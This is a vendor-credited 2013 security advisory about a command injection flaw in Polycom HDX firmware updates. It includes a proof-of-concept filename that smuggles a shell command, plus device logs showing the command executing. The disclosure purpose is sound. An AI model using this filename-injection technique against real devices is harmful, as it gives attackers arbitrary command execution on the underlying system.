Polycom Firmware Update Command Injection

`n.runs AG  
http://www.nruns.com/  
security(at)nruns.com  
n.runs-SA-2013.002  
15-Mar-2013  
___________________________________________________________________________  
Vendor: Polycom, http://www.polycom.com  
Affected Products: Polycom HDX Series  
Affected Version: < 3.1.1.2  
Vulnerability: Polycom Firmware Update Command Injection  
Risk: MEDIUM  
___________________________________________________________________________  
  
Overview:  
  
Polycom HDX systems can be upgraded via Polycom Update Files (PUP files).  
The upgrade functionality is available in the Polycom administrative web  
interface.  
  
Description:  
  
The firmware update functionality in the Polycom web interface is  
vulnerable to a simple command injection vulnerability which allows an  
attacker with access to the web interface to execute arbitrary commands  
on the underlying embedded Linux system.  
  
When uploading a PUP file via the web interface the file is first stored  
on the device and then the filename is passed as an argument to a call  
to the "puputils.ppc" binary in order to verify its integrity. Missing  
input validation allows an attacker to inject additional shell commands  
by using shell metacharacters (such as a semicolon). In order to mount the  
attack a valid PUP file can be renamed as follows:  
  
$ mv polycom-hdx-release-3.0.5-22695.pup 'test;logger PWNED;bla.pup'  
  
When this file is uploaded through the web interface the injected command  
"logger PWNED" is executed on the system. This can also be observed in  
the logs:  
  
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Welcome to the PUP  
Utilities.   
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: Verifying the  
integrity of the PUP file "../web2/docroot/data/test"   
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file  
"../web2/docroot/data/test".   
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: CalculateFileSHA1 on  
pup file failed   
2012-09-02 20:17:01 ERROR unknown: puputils.ppc: pc[0]: Unable to open file  
"../web2/docroot/data/test".   
2012-09-02 20:17:01 INFO unknown: puputils.ppc: pc[0]: returning  
PUP_ERR_FILE_CANT_ACCESS   
2012-09-02 20:17:01 INFO root: pwned  
2012-09-02 20:17:01 INFO jvm: pc[0]: system_pthread: ./puputils.ppc verify  
../web2/docroot/data/test;logger pwned;bla.pup [32512]   
2012-09-02 20:17:01 ERROR jvm: pc[0]: softupdate: command "./puputils.ppc  
verify ../web2/docroot/data/test;logger pwned;bla.pup" returned unexpected  
error 127.  
  
Impact:  
  
Someone with access to the Polycom administrative web interface can  
execute arbitrary commands on the underlying embedded Linux system.  
In combination with some other vulnerability such as a Cross-Site  
Request Forgery vulnerability this attack could potentially be  
performed even without direct access to the web interface. However  
we didn't verify that yet.  
  
Solution:  
  
Polycom released version 3.1.1.2 of the HDX software which fixes this  
issue. It can be downloaded from the Polycom Support page at  
http://support.polycom.com.  
___________________________________________________________________________  
  
Credit:  
Bug found by Moritz Jodeit of n.runs AG.  
___________________________________________________________________________  
  
Unaltered electronic reproduction of this advisory is permitted. For all  
other reproduction or publication, in printing or otherwise, contact  
[email protected] for permission. Use of the advisory constitutes  
acceptance for use in an "as is" condition. All warranties are excluded.  
In no event shall n.runs be liable for any damages whatsoever including  
direct, indirect, incidental, consequential, loss of business profits or  
special damages, even if n.runs has been advised of the possibility of  
such damages.  
  
Copyright 2013 n.runs AG. All rights reserved. Terms of use apply.  
`